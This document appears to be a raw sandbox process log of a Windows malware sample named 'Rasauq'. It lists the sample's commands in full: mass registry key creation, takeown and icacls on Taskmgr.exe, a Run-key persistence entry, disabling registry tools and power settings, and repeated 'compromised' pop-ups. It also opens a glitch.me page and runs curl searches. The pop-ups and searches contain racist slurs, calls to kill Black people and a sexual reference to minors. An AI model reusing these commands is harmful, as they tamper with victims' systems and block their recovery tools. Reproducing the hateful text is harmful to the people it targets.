reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "End of search: 20 match(es) found.\Software\Rasauq on top" /f

C:\Windows\system32\msg.exe

msg * /time:3 "This machine has been compromised by Rasuaq"

C:\Windows\system32\timeout.exe

timeout /t 3 /nobreak

C:\Windows\system32\powercfg.exe

powercfg /hibernate off REM Disables hibernation

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "Device Name"

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "USB Root Hub"

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCR\behead all niggers" /f

C:\Windows\system32\reg.exe

reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "End of search: 39 match(es) found.\Software\Rasauq on top" /f

C:\Windows\system32\msg.exe

msg * /time:3 "This machine has been compromised by Rasuaq"

C:\Windows\system32\timeout.exe

timeout /t 3 /nobreak

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\pcaui.exe

C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f4,0x7ffbbb9bf208,0x7ffbbb9bf214,0x7ffbbb9bf220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1836,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:11

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2176,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2548,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2436 /prefetch:13

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3476,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:9

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4108,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4156,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:9

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4164,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3612,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:14

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5040,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3856,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:14

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5520,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5580,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5732,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5708 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=5576,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6056,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6032 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6052,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6268 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6452,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6612,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6616,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6704 /prefetch:14

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7116,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7148,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7344 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7492,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:1

C:\Windows\system32\msg.exe

